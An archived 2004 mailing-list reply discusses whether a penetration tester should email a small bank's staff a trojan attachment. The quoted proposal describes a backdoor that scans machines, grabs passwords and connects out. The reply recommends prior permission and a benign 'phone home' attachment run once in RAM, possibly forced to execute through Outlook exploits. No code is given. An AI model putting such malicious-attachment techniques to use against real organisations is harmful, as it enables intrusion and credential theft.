From: hwertz@voltron.homelinux.org
Date: Sun Mar 21 2004 - 19:38:38 EST
> Doing a pen-test for a small bank which was proving very difficult to
> get it. A friend of mine suggested I send a backdoor trojan attachment
> via an email. If they clicked on it, the backdoor performs maybe a
> boxscan, grab passwords, and connects out to the Internet. --Much like
> a virus.
*cut*
> I spoke with a previous customer of mine about the idea. He said he
> would be very upset if he was not told prior to that type of test as
> part of normal pen-testing.
*cut*
> What's your ideas on the email pen-tesing?
I would certainly not send a worm that sends out passwords or do a
box scan or anything (without previous permission). I would consider
sending an attachment that "phones home" with IP and perhaps some
identifiable info (like the E-Mail addr of the person if they're running
Outlook, or NetBIOS machine name or something.) The extra info would be
so if they're behind NAT or on DHCP, it'll help narrow down the source of
trouble. I would not have the executable even install, just have it
execute once in RAM. I would feel free to use any Outlook exploits to
attempt to force execution though.
Then if you do get some IPs etc. sent back, you can put in your
report that your attachment was harmless but people (or unpatched
software) automatically running attachments can cause a leak of passwords,
backdoors installed, etc. I don't think you need to actually *get*
passwords to show this 8-).
---------------------------------------------------------------------------
You're a pen tester, but is google.com still your R&D team?
Now you can get trustworthy commercial-grade exploits and the latest
techniques from a world-class research group.
www.coresecurity.com/promos/sf_ept1
----------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:51 EDT